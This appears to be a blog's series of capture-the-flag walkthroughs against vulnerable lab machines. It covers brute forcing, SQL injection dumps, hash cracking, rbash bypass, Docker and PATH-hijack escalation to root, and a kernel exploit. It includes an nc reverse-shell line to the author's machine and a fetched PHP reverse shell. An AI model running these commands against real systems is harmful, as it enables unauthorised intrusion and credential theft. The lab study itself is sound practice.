Tag: tcert

  • This is NullByte from vulhub

    Overview:

    Target Machine IP Address: 192.168.56.122  
    My Machine IP Address: 192.168.56.117

    Mission:

    Boot to Root
    
    Get to /root/proof.txt and follow the instructions.
    
    Level: Basic to intermediate.
    
    Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.
    
    Hints: Use your lateral thinking skills, maybe you’ll need to write some code.

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth1 192.168.56.1/24

    nmap -sC -sV -p- -Pn 192.168.56.122 -o nmap.log

    PORT STATE SERVICE VERSION
    80/tcp open http Apache httpd 2.4.10 ((Debian))
    |_http-title: Null Byte 00 - level 1
    |_http-server-header: Apache/2.4.10 (Debian)
    111/tcp open rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    | program version port/proto service
    | 100000 2,3,4 111/tcp rpcbind
    | 100000 2,3,4 111/udp rpcbind
    | 100000 3,4 111/tcp6 rpcbind
    | 100000 3,4 111/udp6 rpcbind
    | 100024 1 32979/udp6 status
    | 100024 1 42801/udp status
    | 100024 1 48014/tcp status
    |_ 100024 1 60755/tcp6 status
    777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
    | ssh-hostkey: 
    | 1024 163013d9d55536e81bb7d9ba552fd744 (DSA)
    | 2048 29aa7d2e608ba6a1c2bd7cc8bd3cf4f2 (RSA)
    | 256 6006e3648f8a6fa7745a8b3fe1249396 (ECDSA)
    |_ 256 bcf7448d796a194876a3e24492dc13a2 (ED25519)
    48014/tcp open status 1 (RPC #100024)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    

    Let’s visit the IP address as it is running the Apache web server.

    No robots.txt, and nothing is hidden in the source code. I downloaded the image and checked its metadata using exiftool. Found nothing important.

    wget http://192.168.56.122/main.gif
    
    exiftool main.gif

    Let’s check whether the web server hosts any directories or files apart from the index page.

    gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

    I mentioned in my previous walkthroughs that I will be using dirsearch (along with gobuster) with common.txt, to be on the safe side 😉

    dirsearch -u http://192.168.56.122 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f


    We found a couple of directories: javascript, phpmyadmin, and uploads.

    The bad news is that, apart from phpmyadmin, both of the other folders were protected.

    To be honest, at this point I ran out of ideas and leads on what to do (I feel a little exhausted because I haven’t slept well: there is construction going on near my place, and the site emits an intense light throughout the night, so my room is literally no different by day or by night. I am going to find a solution for that, like covering the window blinds with some bed sheets). Anyway, I know that this machine is not a new one, so I quickly sneaked a look at other people’s walkthroughs.

    I had to re-run exiftool on the image file that we downloaded earlier.

    Yes, we got a string. Initially, I thought it might be the password, because we know that the machine has SSH running. In the past, I remember doing a machine where I got the password but was not able to find the username, and the username turned out to be the machine name. Therefore, I used nullbyte as the username and kzMb5nVYJw as the password (this time with a little hope). However, that was not the case. I tried to identify whether it is some kind of hash or encoded message. With my limited exposure, I was not able to do anything. Yes, I had to sneak a look again. Oh man! It is just the name of a directory (who would think of that, but yeah, I need to keep these things in mind so that I won’t fall on my nose again later when a similar situation arises).

    You might not believe that I tried all the tricks I know to get the PIN number; however, all effort went in vain. (I increased my VM to 16 GB, gave Burp 8 GB and ran Intruder with the rockyou.txt payload for one entire night. It was running, but I got a sense that this is not the intended way to solve it. Of course, if you were doing it professionally then you would have to stick with your own methodology.) A few years back, a friend of mine brute-forced a PIN-locked Android TV using Hydra. So I thought I could try that too.

    Yes, I had the logic right but my syntax was not correct. Out of desperation, I asked ChatGPT to fix the syntax. My gosh, it was just a minor quotation mark that messed up my script. Anyway, here is the working syntax.

    hydra -s 80 192.168.56.122 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /usr/share/wordlists/rockyou.txt -la | tee nullbyte.hydra


    After entering the PIN code, we got another input box. Based on the prompt, it looks like there is a database running behind the application. Here are the screenshots.

    When I enter 1 in the “Enter username:” input box of the webpage, the URL changes and I am able to inject or insert a value into the database. Therefore, I am going to use this URL with sqlmap. (I spent a couple of hours solving previous boxes and, during that time, took a good amount of notes on how to use sqlmap. It pays off now 😉)

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1

    Note: Yes, it works and informed me (in bold letters) that the parameter is injectable and that the backend is a MySQL database.

    Then I enumerate the database names.

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs


    Now, I need to know the table name, column name, and the data within it.

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth --tables

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T user --columns

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T user -C user --dump

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T user -C pass --dump

    Just to get the hang of it, I follow it step by step. Otherwise, if you are playing some kind of CTF (especially when time is not on your side), I think you could directly dump the table.

    sqlmap -u http://192.168.56.122/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth -T users --dump

    Database: seth
    user: isis
    pass: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

    echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d

    We get this string:

    c6d6bd7ebf806f43c76acc3681703b81base64:

    I need to do a little cleaning there (I must confess it took a while for me to notice it): I have to remove “base64:” from the above string.

    c6d6bd7ebf806f43c76acc3681703b81

    I tried hash_id first and it gave me a hunch that it is an MD5 hash. Running hash-identifier confirmed that the string is indeed an MD5 hash.

    To break an MD5 hash, I know two ways; here they are…

    hashcat -m 0 'c6d6bd7ebf806f43c76acc3681703b81' /usr/share/wordlists/rockyou.txt

    Output:

    omega

    An alternative method is to use crackstation.net to crack the MD5 hash for you.
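The decode-and-identify step above, written as an added example (not code from the original post). The dumped value has no trailing "=" padding, which is why `base64 -d` printed the hash and then the start of its own error message; this decoder re-adds the padding before decoding, checks the result against the shape of an MD5 digest, and verifies a cracked candidate locally instead of trusting the cracker's output. Standard library only; `md5_hex` and `verify_md5_candidate` are helper names chosen here.

```python
# Added example: lenient base64 decoding plus MD5 shape check and candidate
# verification for the value dumped from the `user` table in the post above.
import base64
import binascii
import hashlib
import re

# An unsalted MD5 digest prints as exactly 32 hex characters.
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def decode_base64_lenient(value: str) -> str:
    """Decode base64 text that may be missing its trailing '=' padding.

    Dumped or copied values often lose the padding; the data itself is intact,
    so we restore the padding (length must be a multiple of 4) and decode."""
    value = value.strip()
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not valid base64 text: {exc}") from exc


def looks_like_md5(value: str) -> bool:
    """True for 32 lowercase hex characters. Length alone cannot distinguish
    MD5 from other 128-bit digests, so treat this as a hint, not a proof."""
    return bool(MD5_HEX.match(value))


def md5_hex(candidate: str) -> str:
    """Hex MD5 of a candidate password (helper, constructed for this example)."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def verify_md5_candidate(digest: str, candidate: str) -> bool:
    """Confirm a password a cracker reported before relying on it."""
    return md5_hex(candidate) == digest.strip().lower()


# Constructed sample input: the `pass` value dumped above (taken from the post).
DUMPED = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"

if __name__ == "__main__":
    decoded = decode_base64_lenient(DUMPED)
    print(decoded, "md5-shaped" if looks_like_md5(decoded) else "not md5-shaped")
```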

    We got an initial foothold!

    I ran the command:

    ls -lR /home

    We learn that there are users with home folders: bob, eric and ramses.

    Based on my previous experience playing with boxes, I manually check everywhere I think useful files are usually located, and if I run out of options, then we can leverage the power of linpeas.sh 🙂

    Initially, I thought I could find a user flag, but it looks like this box doesn’t contain one, because I searched the entire box using the following command:

    find / -type f -name user.txt 2>/dev/null


    Not necessary

    Rabbit holes:

    I checked the kernel version and tried the Dirty COW exploit. To be candid, I think we could pwn the machine through a kernel exploit, but we would need to invest more time, so let’s not delve too much into it because my plate is rather full at this moment.

    By the way, I tried this exploit.


    Another Rabbit hole:

    Then, while I was checking here and there, I got the MySQL root password.

    I wasn’t able to find anything useful with it, so I checked the MySQL version. It was running quite an old version, and I thought I could get something out of it. My hopes were pretty high, but it wasn’t that helpful. By the way, I tried this exploit.

    Main Findings:

    Then I found (which means I spent quite some time looking here and there lol) a backup folder. A procwatch binary there runs with root privilege. Based on its output, we can make out that it lists the processes running on the machine, exactly like the ps command.

    We will use PATH redirection to escalate privilege: procwatch calls ps by name, so a fake ps placed earlier in PATH gets run with its privileges.

    echo "/bin/sh"  >  ps
    chmod +x ps

    Add the location (path) of procwatch to the front of PATH:

    export PATH="/var/www/backup:$PATH"

    ./procwatch

    id

    We got root!
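From the defender's side, the condition this escalation relies on is a privileged program resolving a bare command name through a PATH that contains a directory unprivileged users can write to. The following is an added example (not the post's or the box's code) that resolves a command the way the shell does and audits each PATH entry by ownership and mode bits; the directories in `demo()` are constructed temporary stand-ins for /var/www/backup and /bin, and all function names are this example's own.

```python
# Added example: PATH resolution and a PATH audit for the kind of misconfiguration
# the procwatch walkthrough above exploits. Standard library only.
import os
import stat
import tempfile
from typing import List, Optional, Tuple


def resolve_command(name: str, path: str) -> Optional[str]:
    """First executable regular file called `name` along `path`, searched in
    the order a shell (or libc's execvp) uses. Returns None if not found."""
    for entry in path.split(":"):
        directory = entry or "."   # an empty PATH entry means the current directory
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit_path(path: str) -> List[Tuple[str, str]]:
    """Return (entry, reason) pairs for PATH entries a privileged program must
    not trust. Ownership and mode bits are inspected rather than os.access(),
    so the verdict is the same whether the auditor runs as root or not.
    A world-writable directory is flagged even with the sticky bit set: the
    sticky bit only stops deleting others' files, not dropping a new `ps`."""
    findings: List[Tuple[str, str]] = []
    for entry in path.split(":"):
        if entry in ("", "."):
            findings.append((entry, "entry resolves to the current directory"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            findings.append((entry, "does not exist"))
            continue
        if not stat.S_ISDIR(st.st_mode):
            findings.append((entry, "not a directory"))
        elif st.st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable"))
        elif st.st_uid != 0:
            findings.append((entry, f"owned by uid {st.st_uid}, not root"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((entry, f"group-writable by gid {st.st_gid}"))
    return findings


def demo() -> dict:
    """Constructed scenario mirroring the post: a world-writable 'backup'
    directory holding a fake ps, listed before the system directory."""
    base = tempfile.mkdtemp()
    backup = os.path.join(base, "backup")   # stands in for /var/www/backup
    system = os.path.join(base, "bin")      # stands in for /bin
    for directory in (backup, system):
        os.mkdir(directory)
        ps_path = os.path.join(directory, "ps")
        with open(ps_path, "w") as fh:
            fh.write("#!/bin/sh\necho ps from %s\n" % directory)
        os.chmod(ps_path, 0o755)
    os.chmod(backup, 0o777)                 # anyone may drop a binary here
    hijacked_path = backup + ":" + system
    return {
        "fake_ps_wins": resolve_command("ps", hijacked_path) == os.path.join(backup, "ps"),
        "backup_flagged": (backup, "world-writable") in audit_path(hijacked_path),
        "system_alone_resolves_real_ps": resolve_command("ps", system) == os.path.join(system, "ps"),
        "findings": audit_path(hijacked_path),
    }


if __name__ == "__main__":
    for entry, reason in demo()["findings"]:
        print(f"UNSAFE {entry}: {reason}")
```

The fix on the program side is the mirror image of the audit: a setuid or root-run helper should call ps by absolute path (or reset PATH to a fixed, root-owned list) rather than inherit the caller's PATH.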

    Finally done with NullByte. However, I am going to redo this machine later on because I want to try manual SQL injection, since for the OSCP we can’t use the sqlmap tool. It’s 5:07 PM and I am finally going to have lunch now lol

    Referred link:
    – https://linuxize.com/post/how-to-add-directory-to-path-in-linux/

  • rooting cybersploit 2 machine ?


    Overview:

    Target Machine IP Address: 192.168.56.41
    My Machine IP Address: 192.168.56.20

    Mission:

    Boot to Root

    Your target is gain the Root access
    
    There is no any flag in this VMs
    
    Share root access with me twitter@cybersploit1
    
    This works better with VirtualBox rather than VMware

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- 192.168.56.41 -o nmap.log

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
    80/tcp open http Apache httpd 2.4.37 ((centos))

    Let’s browse 192.168.56.41

    Some strings are encrypted. Let’s check out the source code (Ctrl+U shortcut key).

    Yes, this is a ROT47-encrypted message. I thought of writing a script to do this; however, let’s not waste time. Better to google an online tool for this task. I used this one.

    username: D92:=6?5C2 -> shailendra
    password: 4J36CDA=@:E -> cybersploit1
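The script the post skips, as an added example (not the author's code): a ROT47 decoder generalised to any rotation over the 94 printable ASCII characters, plus a helper that decodes "label: ciphertext" lines like the two quoted above. ROT47 is its own inverse, so one function both encodes and decodes. Note that the password ciphertext as quoted above decodes to "cybersploit"; the trailing 1 of the working password is not part of the quoted string. `SAMPLE` is constructed from the two lines above; all function names are this example's own.

```python
# Added example: ROT47 / general printable-ASCII rotation decoder for the
# strings found in the cybersploit2 page source. Standard library only.
from typing import Dict, List, Tuple

PRINTABLE_START = 33   # '!'
PRINTABLE_COUNT = 94   # '!' .. '~' inclusive


def rot_printable(text: str, shift: int) -> str:
    """Rotate every printable ASCII character by `shift` positions within
    '!'..'~'; spaces, newlines and non-ASCII characters pass through."""
    out = []
    for ch in text:
        code = ord(ch)
        if PRINTABLE_START <= code < PRINTABLE_START + PRINTABLE_COUNT:
            code = PRINTABLE_START + (code - PRINTABLE_START + shift) % PRINTABLE_COUNT
        out.append(chr(code))
    return "".join(out)


def rot47(text: str) -> str:
    """ROT47 is rotation by 47 = 94/2, so applying it twice gives the input back."""
    return rot_printable(text, 47)


def decode_credential_lines(block: str) -> Dict[str, str]:
    """Decode 'label: ciphertext' lines. Only the first ':' separates the label,
    because the ciphertext itself may contain ':' (as 'D92:=6?5C2' does)."""
    creds = {}
    for line in block.splitlines():
        if ":" not in line:
            continue
        label, cipher = line.split(":", 1)
        creds[label.strip()] = rot47(cipher.strip())
    return creds


def candidate_rotations(text: str, must_contain: str) -> List[Tuple[int, str]]:
    """When the rotation amount is unknown, try all 93 non-trivial shifts and
    keep those whose plaintext contains a word you expect (a crib)."""
    return [(n, rot_printable(text, n)) for n in range(1, PRINTABLE_COUNT)
            if must_contain in rot_printable(text, n)]


# Constructed sample: the two encoded strings quoted from the page source above.
SAMPLE = "username: D92:=6?5C2\npassword: 4J36CDA=@:E"

if __name__ == "__main__":
    print(decode_credential_lines(SAMPLE))
```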

    Since the target machine is running SSH service, let’s try that.

    ssh shailendra@192.168.56.41

    ls -lah

    We got a hint.txt.

    The system is running docker.

    Remember, this will always be our black book of magic (gtfobins.github.io/).


    docker run -v /:/mnt --rm -it alpine chroot /mnt sh 

    However, in order to run this command, you need to provide internet access (at least in my case); otherwise you might not be able to download the alpine:latest image.

    Finally, cybersploit2 is pwned!!

  • Shelling Decoy

    Overview:

    Target Machine IP Address: 192.168.56.42
    My Machine IP Address: 192.168.56.20

    Mission:

    THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FLAGS AVAILABLE IN THIS VM.
    
    FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- 192.168.56.42 -o nmap.log

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    80/tcp open http Apache httpd 2.4.38
    | http-ls: Volume /
    | SIZE TIME FILENAME
    | 3.0K 2020-07-07 16:36 save.zip

    The zip file requires a password to open it. I am not able to find anything that could be leveraged as the password. Let’s crack it by brute force, using rockyou.txt with the fcrackzip tool.

    fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip

    password: manuel

    We were able to get some juicy information. I am not going to write about each file here; however, I am sure you know well that the shadow file holds the hashed form of the users’ passwords. I think this may be enough.

    We need to break the hash, so let’s use john for the task: take the necessary hash and put it into a file.

    username: 296640a3b825115a47b68fc44501c828

    echo '$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.' > ../hash.txt

    ssh 296640a3b825115a47b68fc44501c828@192.168.56.42

    password: server

    We need to bypass the rbash restriction. I have never used it; however, I have seen this in blogs and YouTube videos by IppSec.

    If you want to know more about rbash bypass, you can read this guide: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

    From that PDF resource, I tried all the commands and they didn’t work. However, as I tried the following from the Advanced Techniques part, it no longer gives me

    ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"

    Now we can see that it no longer shows us the rbash restriction but rather “command not found”, which means the binary or command search path needs to be fixed here.

    What I did was echo the PATH of my Kali machine, copy it, and set it on the target machine. Perhaps you might understand it better if you see this screenshot.

    PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin

    Ok, let’s download pspy on the Kali machine and then transfer it to our target machine. I used SimpleHTTPServer to do the work; of course, you can have your own method 🙂

    Let’s do a searchsploit chkrootkit, or search chkrootkit on Google (it will show exploit-db, which is the GUI of searchsploit).

    When we read the exploit steps (how to configure it and how to use it), it tells us this..

    The steps are quite self-explanatory; however, what I did here is, I checked the location of the nc program on the target box and then let it run /bin/sh on port 1234, to reverse a connection to IP address 192.168.56.33 (my Kali machine). Of course, as per the instructions, we need to give execute permission to our executable file.

    Note: I checked the cron entries and was not able to find any relevant information, neither that update (which we have created) is running nor anything chkrootkit-related. Interestingly, when I checked the processes through pspy64, /tmp/update is periodically being run. Therefore, we can leverage that for our purpose. By the way, this might be because when we run the honeypot.decoy program, it triggers chkrootkit.

    Exploit 1:

    #!/bin/bash
    echo 'root:tcert.net' | sudo chpasswd

    Save it as update (by the way, you have to use the nano editor this time because, if I am not wrong, the vi editor is not available).

    chmod +s update

    (I sipped tea and looked around) and then

    su - root

    password: tcert.net


    Exploit 2: (It didn’t work for me. I need to dig a little deeper.)

    echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update
    chmod +x update

    That’s all guys 🙂


  • Let’s pwn cybersploit machine

    Overview:

    Target Machine IP Address: 192.168.56.40
    My Machine IP Address: 192.168.56.20

    Mission:

    THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FLAGS AVAILABLE IN THIS VM.
    
    FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- 192.168.56.40 -o nmap.log


    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
    80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

    username: itsskv

    cybersploit

    CyBeRSplOiT

    I ran nikto but didn’t get any information; gobuster, however, did give me something..

    gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

    http://192.168.56.40/robots.txt


    R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

    Let’s decode the string…

    echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

    Flag1: cybersploit{youtube.com/c/cybersploit}

    By the way, you might be wondering what is at http://192.168.56.40/hacker (it was just a gif).

    Ok, since we got the username: itsskv

    and password: cybersploit{youtube.com/c/cybersploit}

    and the box is running SSH, how about we try that first?

    ssh itsskv@192.168.56.40

    ls -lah

    cat flag2.txt

    I used this website to decode it: https://cryptii.com/pipes/binary-to-english

    good work !
    flag2: cybersploit{https:t.me/cybersploit1}

    uname -a

    3.13.0-32-generic

    I googled “3.13.0-32-generic exploit”; searchsploit didn’t work for me (I will figure this out later).


    https://www.exploit-db.com/exploits/37292

    gcc 37292.c -o exploit

    ./exploit

    flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

    That’s it guys! Going to have breakfast now … little hungry lol

    Wish you a productive day!!

  • Let’s take down victim01

    Overview:

    Pwned Machine IP Address: 192.168.56.38
    My Machine IP Address: 192.168.56.20

    Mission:

    To gain access to root and read the flag file Flag.txt.

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- -o nmap.log 192.168.56.38

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
    8080/tcp open http BusyBox httpd 1.13
    8999/tcp open http WebFS httpd 1.21
    9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)

    http://192.168.56.38:8999

    Let’s download WPA-01.cap

    Let’s run the packet in wireshark

    wireshark WPA-01.cap &

    I tried my best to dive into the cap file, but I was not able to get anything concrete. Based on the previous machine that we did, I have a hunch that we will get a username and a password out of this.

    Although it shows many devices connected to the router (dlink), only dlink worked as a username. You might be wondering how I got the password? You might know if you have read this post.

    Yeah I did run aircrack-ng on the CAP file with rockyou file.

    aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt

    Yes, the password is p4ssword

    ssh dlink@192.168.56.38        password: p4ssword

    I have made it a habit that, as soon as I get a limited (or user) shell, I manually check all the low-hanging fruits.

    Such as

    sudo -l

    cat ~/.viminfo

    crontab -l

    history

    find / -perm -u=s -type f 2>/dev/null

    find / -perm 0777 -type f 2>/dev/null

    find / -writable -type d 2>/dev/null

    to name a few. If I don’t find anything, then I use linpeas.sh and other scripts, by uploading them to the /tmp folder of that limited user account.

    We found something interesting.

    https://gtfobins.github.io/gtfobins/nohup/

    Note: kindly bookmark this website site. https://gtfobins.github.io/


    nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"

    yeah, we got the flag..

    Method 2:

    To check writable directories:

    find / -writable -type d 2>/dev/null

    /var/www/bolt/public/files has 777 permissions

    If you have carefully read the output from nmap, you might have seen that the server is running the PHP CLI server. That means we can upload a PHP reverse shell.

    Let’s do that..

    On Kali Machine

    I have downloaded and stored my shells and other tools at /opt

    python -m SimpleHTTPServer 8000

    On Victim01 Machine

    cd /var/www/bolt/public/files/

    wget 192.168.56.33:8000/php-reverse-shell.php

    chmod +x php-reverse-shell.php

    Also change the IP address and port to your choice. Mine: IP 192.168.56.33, port 1234

    Let’s set up an nc setup on Kali Machine to receive a reverse connection from the Victim01 machine.


    I tried to execute the PHP shell on the victim machine to get the reverse connection and got a limited shell. However, when I requested the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know the primary reason behind it, and I think I will need to explore this more. However, I am going to keep this in mind while shelling other boxes in the future.

    yes, another way to get root!

    That’s all guys 🙂

  • Pwning Pwned

    Overview:

    Pwned Machine IP Address: 192.168.56.37
    My Machine IP Address: 192.168.56.20

    Mission:

    To gain access to root and read the flag file Flag.txt.

    Download:

    You can download the machine from here.

    ************************************

    To know the IP address of the Target Machine:

    sudo arp-scan --interface=vboxnet0 192.168.56.1/24

    Scanning:

    nmap -sC -sV  -p- 192.168.56.37 -o nmap.log

    Output:

    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd 3.0.3
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    80/tcp open http Apache httpd 2.4.38 ((Debian))

    Let’s get a glimpse of the website first, because the machine is running an Apache web server.

    Attacker name:

    Annlynn

    After the attacker’s name, I didn’t get anything else. So, as usual, I like to check robots.txt.

    http://192.168.56.37/robots.txt

    It redirects to some files, and I won’t go through them here because it was a rabbit hole.

    I did run the Nikto scanner and got a little information, but it was nothing special, as it just gave me things I got earlier. (The folder called nothing. That’s all.)


    Gobuster Scanner:

    gobuster dir -u 192.168.56.37 -w /usr/share/wordlists/directory-list-2.3-medium.txt -o gobuster.log

    We got a new file, called hidden_text. This experience taught me an important lesson, i.e. never depend on a single tool for everything.

    http://192.168.56.37/hidden_text/

    I tried every parameter and thought of automating the process, either through Burp Suite or a shell command. Perhaps, after this task is over, I will write a script to automate this task for us.

    http://192.168.56.37/pwned.vuln/

    View source code:

    ftpuser' && $pw=='B0ss_B!TcH'

    Exploitation:

    Well, the credentials didn’t work with the above login panel, so let us try FTP (we know the machine is running FTP from the Nmap scan).

    Yes, I was able to log into the machine using the above credentials.

    However, I think it is important to pass -a as an argument along with the command: dir -a. Although the command executed successfully, I was not able to see anything without it.

    I found two files in there. They look important, because one file is an SSH key and the other note contains a username. Probably we could get access by using this information.

    username: ariana

    password: ssh private key

    Remember, before using an SSH key, set its permissions to either 400 or 600 (usually I like 400 in production and 600 when I am trying something like a pwning machine).

    chmod 600 id_rsa
    ssh ariana@192.168.56.37 -i id_rsa

    Yes, we got a shell here. Usually, as soon as I get a shell, I like to try some low hanging fruits first. Like what is shown in the screenshot.

    So far we got this information:

    User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

    cat /home/messenger.sh  (make a mental note)

    congratulations you Pwned ariana
    
    Here is your user flag _______
    
    fb8d98be1265dd88bac522e1b2182140
    
    Try harder.need become root

    To be honest, I am yet to have breakfast and thought of grabbing some, but because of this flag, I am going to stick with the machine some more.

    I found a diary called ariana-personal.diary

    It was written

    It’s Ariana personal Diary :::

    Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

    I didn’t get anything special, so how about we run the script that we got from above? /home/messenger.sh

    sudo -u selena /home/messenger.sh

    I struggled a little here and need to have a peek on other people’s walkthrough (it is here.)

    Yes, it is the perfect time to get an interactive shell.

    python3 -c 'import pty; pty.spawn("/bin/bash")'

    id

    docker images

    docker run -v /:/mnt --rm -it privesc chroot /mnt sh

    I got root here; however, I was not happy because I don’t know what this command (docker run -v /:/mnt --rm -it privesc chroot /mnt sh) does. So I am going to do a little research after breakfast…

    Wish you all a productive day!!

    Some rabbit holes while I was digging through the account of ariana.

    Other things I did:

    I thought of finding SUID and SGID files manually; however, since I have linpeas.sh on my Kali machine (192.168.56.33), I am going to upload the script from there to the target machine. That way, it will do everything automatically.

    chmod +x linpeas.sh (on the target machine, in the /tmp folder)

    While I was going through the extensive report from linpeas.sh, I could definitely conclude that the machine is running an outdated Docker container.

    ps aux | grep "docker"

    1. Result excerpt from linpeas.sh

    2. Result excerpt from linpeas.sh


  • Will I get a root access to PumpkinRaising Machine ?

    Overview:

    Pumpkin Raising Machine IP Address: 192.168.56.17
    My Machine IP Address: 192.168.56.1

    Mission:

    Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.

    Step 01:

    nmap -sC -sV -p- 192.168.56.17 -oN nmap.log

    Output:

    Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-01 13:30 IST
    Nmap scan report for 192.168.56.17
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
    
    80/tcp open  http    Apache httpd
    | http-robots.txt: 23 disallowed entries (15 shown)
    | /includes/ /scripts/ /js/ /secrets/ /css/ /themes/ 
    | /CHANGELOG.txt /underconstruction.html /info.php /hidden/note.txt 
    | /INSTALL.mysql.txt /seeds/seed.txt.gpg /js/hidden.js /comment/reply/ 
    |_/filter/tips/
    |_http-server-header: Apache
    |_http-title: Mission-Pumpkin
    
    

    Step 02:

    Actually, nmap is revealing enough information to go through; however, let me stick with my methodology.

    Since it is clearly running a web server on port 80, let’s visit the website and check its source code first.

    When I saw there is an images folder, I was a little excited, because we got a beautiful tip in the previous box. (It is here)

    Oops!

    Step 03:

    You can also see that there is a base64-encoded message in the source code.

    I thought this may reveal a big secret like it did in my previous Pumpkin box. However, it just turned out to be a little troll 🙂

    As I was going through the source code, I saw a link to pumpkin.html

    I took down the names of the characters in my notes; perhaps I could use them for some brute-force purpose, because we know that the machine is running SSH on port 22 (through nmap scanning).

    In the source code, there is another encoded string, which turned out to be base32. (I did some reading on base32 and tried it myself to ensure that this string is base32.)

    Besides, if you scroll down to the bottom, you will see there is some hex string with it.

    For the time being, I saved that hex to a file called hex.txt and kept it there for some time, because we need to decode that base32 string.

    I downloaded that pcap file and tried to trace it in Wireshark.

    Figure 1 (screenshot)

    Figure 2 (screenshot)

    Follow the TCP Stream

    Figure 3 (screenshot)

    Figure 4 (screenshot)

    Based on figures 3 and 4, we can conclude that we got another seed. Do you see that?

